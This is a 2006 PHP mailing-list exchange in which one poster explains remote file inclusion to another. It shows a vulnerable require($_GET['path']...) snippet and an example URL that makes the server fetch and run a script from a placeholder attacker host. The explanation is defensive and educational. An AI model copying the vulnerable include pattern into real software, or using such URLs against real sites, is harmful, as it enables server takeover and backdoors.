At 9:13 PM +0000 11/14/06, Stut wrote:
Ok, so badscript.php is a bad name for this script. Let's say
show.php is a script you've written. You were tired, the kids were
running around you screaming and shouting, and you wrote something
like the following without really thinking about it...
<?php
require($_GET['path'].'commonfuncs.inc.php');
// Do other stuff here, using functions in commonfuncs.inc.php
?>
The *bad guy* can now hit the URL...
http://yoursite.com/show.php?path=http://badguys.net/injectionscript.txt?ignored=
This causes show.php to include (i.e. execute!!) the remote file
injectionscript.txt from badguys.net at this URL...
http://badguys.net/injectionscript.txt?ignored=commonfuncs.inc.php
Since this gets executed on your server it can do anything one of
your scripts can do. The only symptom would be that show.php will
not work for that request. Do the bad guys care? Probably not,
because by the time it fails they've already replaced your index.php
and potentially installed a rootkit, backdoors and whatever else
(depending, of course, on how locked down the web server is and your
file permissions).
Hope that makes sense now.
-Stut
-Stut:
Yes, I believe that the "require($_GET[])" is one of the things Chris
Shiflett talks about in his book. I should have guessed that was what
everyone was talking about. But, considering that I never do that and
my site was highjacked, I was thinking it must have been something
different.
It all makes sense now.
Sorry for being so dense.
Thanks everyone.
tedd
PS: My kids are too old to scream -- it's grand-kids now.
--
-------
http://sperling.com http://ancientstones.com http://earthstones.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
